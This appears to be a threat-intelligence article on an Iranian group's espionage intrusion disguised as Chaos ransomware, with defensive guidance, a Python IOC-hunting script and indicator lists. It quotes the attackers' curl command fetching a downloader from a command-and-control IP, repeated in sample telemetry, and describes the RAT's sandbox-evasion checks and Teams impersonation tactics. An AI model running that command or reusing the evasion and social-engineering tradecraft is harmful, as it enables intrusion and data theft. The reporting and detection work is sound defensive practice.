An intrusion initially flagged as a Chaos ransomware attack has been unmasked as a state-sponsored espionage operation by MuddyWater (also tracked as Seedworm and Mango Sandstorm), an Iranian threat group affiliated with the Ministry of Intelligence and Security (MOIS). Rapid7 analysts, who investigated the incident in early 2026, found that no files were ever encrypted — the ransomware branding was cover for credential theft, lateral movement, and data exfiltration.
MuddyWater False Flag: Technical Details
The operation relied entirely on social engineering and legitimate tooling — no software vulnerability was exploited. Attackers initiated contact through Microsoft Teams, impersonating IT support staff and conducting interactive screen-sharing sessions with victims. During those sessions, targets were instructed to enter their credentials into text files or a phishing page (adm-pulse[.]com) styled after Microsoft Quick Assist — a remote-assistance tool built into Windows.
Once credentials were harvested, the attackers modified multi-factor authentication (MFA) settings on the compromised accounts, then used those accounts to authenticate directly to Domain Controllers over VPN. They installed two legitimate remote access tools — DWAgent and AnyDesk — for persistent access, then executed a curl command to download the primary malware from a command-and-control server at 172.86.126.208:443:
curl -o ms_upd.exe http://172.86.126.208:443/ms_upd.exe
ms_upd.exe is a downloader Rapid7 calls Stagecomp. It registers the victim with the C2 at moonzonet[.]com, polls for instructions, then downloads three components that together form the Darkcomp RAT (Remote Access Trojan — malware giving the attacker persistent remote control of an infected machine):
| File | Role |
|------|------|
| Game.exe | Custom RAT masquerading as Microsoft WebView2 |
| WebView2Loader.dll | Legitimate Microsoft dependency used as cover |
| visualwincomp.txt | Encrypted configuration file (AES-256-GCM, key in binary) |
The RAT's PDB path — the internal file path the compiler embedded during build — references the official Microsoft WebView2APISample project, confirming it was deliberately trojanized.
What the RAT Actually Does
Game.exe implements 12 commands including run_cmd, run_powershell, interactive shell sessions, file upload and deletion, and re-registration with a new agent ID. It polls uploadfiler[.]com every 60 seconds. Strings are XOR-encoded (key 0xAB), and the binary performs a series of anti-sandbox checks before executing: it looks for virtualization DLLs (vmcheck.dll, sbiedll.dll, api_log.dll), compares the CPU name against VMware, KVM, Hyper-V, and Virtual keywords, and uses GetTickCount() to detect time-skipping — a sandbox technique that fast-forwards execution to bypass timed detonation delays.
What Gave Away the False Flag
Rapid7 identified several behavioral inconsistencies that exposed this as a MuddyWater operation rather than genuine ransomware:
No encryption occurred. Despite Chaos ransomware branding, victim files remained intact. The attackers exfiltrated data and posted it on the Chaos Data Leak Site (DLS) to extort victims, but never ran a file encryptor.
Certificate fingerprint. The Stagecomp downloader was signed with a code-signing certificate issued to the identity "Donald Gay" (thumbprint B674578D4BDB24CD58BF2DC884EAA658B7AA250C). This exact identity previously signed both the Stagecomp downloader and the Darkcomp backdoor in an earlier campaign Rapid7 calls Operation Olalampo, which targeted organizations in the U.S. and Middle East/North Africa region.
Infrastructure overlap. The domain moonzonet[.]com had been observed in prior MuddyWater activity in early 2026. The hosting infrastructure was traced to RouterHosting VPS infrastructure in the UAE, consistent with MuddyWater's known operational footprint.
Tradecraft fingerprint. Injecting pythonw.exe into suspended processes — observed during lateral movement — is a documented MuddyWater behavior. Rapid7 assessed attribution at moderate confidence.
Exploitation Status and Threat Landscape
No CVE (Common Vulnerabilities and Exposures — a standardized identifier for disclosed software flaws) was exploited. MuddyWater achieved initial access entirely through social engineering. This is consistent with the group's historical preference for credential theft over vulnerability exploitation — a pattern observed in Rapid7's prior MuddyWater research.
MITRE ATT&CK (a publicly maintained framework mapping adversary tactics and techniques to standardized T-numbers) techniques observed include:
- T1566 — Phishing via Microsoft Teams
- T1219 — Remote Access Tools (DWAgent, AnyDesk)
- T1078 — Valid Accounts (stolen credentials)
- T1021.001 — Remote Desktop Protocol lateral movement
- T1041 — Exfiltration over C2 channel
- T1497 / T1622 — Virtualization/Debugger evasion
The adoption of Chaos ransomware branding follows a pattern: MuddyWater was previously linked to Qilin ransomware-as-a-service (RaaS — a model where developers license ransomware to operators for a share of proceeds) in late 2025. After that attribution became public, the group appears to have pivoted to Chaos branding to maintain deniability and obscure espionage objectives under the cover of financially motivated cybercrime.
As of late March 2026, the Chaos RaaS portal claimed 36 victims across U.S. construction, manufacturing, and business services sectors, with ransom demands reaching $300,000.
Who Is Affected
Any organization using Microsoft Teams for IT support workflows is a potential target. MuddyWater's primary focus has historically been government agencies, telecommunications providers, defense contractors, and NGOs in the Middle East, Israel, Turkey, India, and the U.S. The false flag Chaos campaign extends that reach into commercial sectors where IT support impersonation via Teams is less scrutinized.
What You Should Do Right Now
- Restrict Microsoft Teams external access. Limit who can initiate calls or screen-sharing sessions from external tenants. Go to Teams Admin Center → External Access and apply allowlists rather than permitting all external organizations.
- Enforce phishing-resistant MFA. Replace SMS/push-notification MFA with FIDO2 hardware keys or certificate-based authentication. Stolen passwords become worthless if the MFA channel cannot be intercepted.
- Block unauthorized remote access tools. If DWAgent and AnyDesk are not approved in your environment, add them to your endpoint policy blocklist now. Legitimate IT tools installed without a ticketed request are a major red flag.
- Alert on curl downloading executables. Create a SIEM (Security Information and Event Management — a platform that aggregates and correlates security logs) rule triggering on curl or certutil fetching .exe or .dll files from external IPs.
- Hunt for the IOCs below. Query your EDR (Endpoint Detection and Response) for the file hashes and domains listed below. The moonzonet[.]com and uploadfiler[.]com domains are direct indicators of active compromise.
- Review MFA configuration audit logs. MuddyWater modified MFA settings after initial access. Look for MFA changes not initiated by an IT Help Desk ticket and investigate immediately.
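As an added example (not code from Rapid7 or this article), the following Python implements the two hunting steps above: the curl/certutil-fetching-an-executable rule and a match against the article's domains, IPs and SHA-256 hashes, run over constructed Sysmon-style process-creation events. The `.corp.local` internal DNS suffix and the sample events are assumptions.

```python
import ipaddress
import re

# Indicators taken from the article, undefanged so they can be matched against telemetry.
IOC_DOMAINS = {"moonzonet.com", "uploadfiler.com", "adm-pulse.com"}
IOC_IPS = {"172.86.126.208", "77.110.107.235", "93.123.39.127"}
IOC_SHA256 = {
    "24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14",  # ms_upd.exe (Stagecomp)
    "1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6",  # Game.exe (Darkcomp RAT)
    "c86ab27100f2a2939ac0d4a8af511f0a1a8116ba856100aae03bc2ad6cb0f1e0",  # visualwincomp.txt
}
DOWNLOADERS = {"curl.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://([^/\s:]+)(?::\d+)?/\S*\.(?:exe|dll)\b", re.IGNORECASE)
INTERNAL_SUFFIX = ".corp.local"  # assumed internal DNS suffix; adjust to your environment

def is_external(host: str) -> bool:
    """True for a public IP address or any DNS name outside the assumed internal suffix."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return not host.lower().endswith(INTERNAL_SUFFIX)

def classify(event: dict) -> list:
    """Return the reasons a Sysmon-style process-creation event should alert ([] if clean)."""
    reasons = []
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    match = URL_RE.search(event.get("CommandLine", ""))
    host = match.group(1).lower() if match else ""
    if image in DOWNLOADERS and host and is_external(host):
        reasons.append(f"{image} fetching executable from external host {host}")
    if host in IOC_DOMAINS or host in IOC_IPS:
        reasons.append(f"known C2/staging indicator {host}")
    for part in event.get("Hashes", "").split(","):  # Sysmon format: "SHA256=...,MD5=..."
        algo, _, digest = part.partition("=")
        if algo.strip().upper() == "SHA256" and digest.strip().lower() in IOC_SHA256:
            reasons.append(f"known malicious SHA-256 {digest.strip().lower()}")
    return reasons

# Constructed sample telemetry: the article's curl command, an internal fetch, a known-bad binary, benign curl.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl -o ms_upd.exe http://172.86.126.208:443/ms_upd.exe"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl -o agent.exe http://10.20.30.40/agent.exe"},
    {"Image": r"C:\Users\jdoe\AppData\Local\WebView2\Game.exe", "CommandLine": "Game.exe",
     "Hashes": "SHA256=1319D474D19EB386841732C728ACF0C5FE64AA135101C6CEEE1BD0369ECF97B6"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl -s https://api.github.com/repos/example/project/releases"},
]
```

Feed real Sysmon Event ID 1 records (their Image, CommandLine and Hashes fields) in place of SAMPLE_EVENTS; only the first and third sample events produce alerts.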
Indicators of Compromise
File hashes (SHA-256):
- ms_upd.exe (Stagecomp): 24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14
- Game.exe (Darkcomp RAT): 1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6
- visualwincomp.txt (encrypted config): c86ab27100f2a2939ac0d4a8af511f0a1a8116ba856100aae03bc2ad6cb0f1e0
Domains:
- moonzonet[.]com — Stagecomp C2 / payload staging
- uploadfiler[.]com — RAT C2
- adm-pulse[.]com — credential phishing page
IP addresses:
- 172.86.126.208 — malware hosting
- 77.110.107.235 — Teams attack origin
- 93.123.39.127 — Teams attack origin
Certificate thumbprint: B674578D4BDB24CD58BF2DC884EAA658B7AA250C (Donald Gay, Microsoft ID Verified CS AOC CA 02)
Background: Understanding the Risk
False flag operations in cyberspace are not new, but their use by state-sponsored actors to mask espionage as ransomware is an increasingly refined tactic. When defenders see ransomware indicators, they naturally focus on restoring systems and paying or negotiating — not on investigating what data may have been exfiltrated for intelligence purposes. By the time the victim realizes no encryption occurred and questions the attack's motive, the espionage objective is complete.
MuddyWater (Seedworm) has operated since at least 2017, conducting campaigns across the Middle East, Asia, Europe, and North America. The group is attributed to Iran's MOIS and has consistently evolved its tooling to avoid detection — moving from PowerShell-heavy scripts to Golang and C++ implants, and now to signed, trojanized Microsoft tooling. The Teams-based social engineering vector is particularly concerning because it exploits the inherent trust employees place in internal IT support channels.
The Chaos RaaS group itself is a separate entity — MuddyWater is not believed to operate the ransomware infrastructure but rather used Chaos as a convenient cover. This supply-side relationship between nation-state actors and cybercriminal infrastructure represents a blurring of espionage and cybercrime that complicates attribution and legal response.
Conclusion
Organizations relying on Microsoft Teams for IT support must treat unsolicited external Teams calls as a social engineering risk, not just a productivity tool. MuddyWater's false flag operation confirms that credential theft — not malware exploitation — remains the path of least resistance for sophisticated actors. Restricting external Teams access and eliminating push-notification MFA are the two highest-priority controls to implement immediately.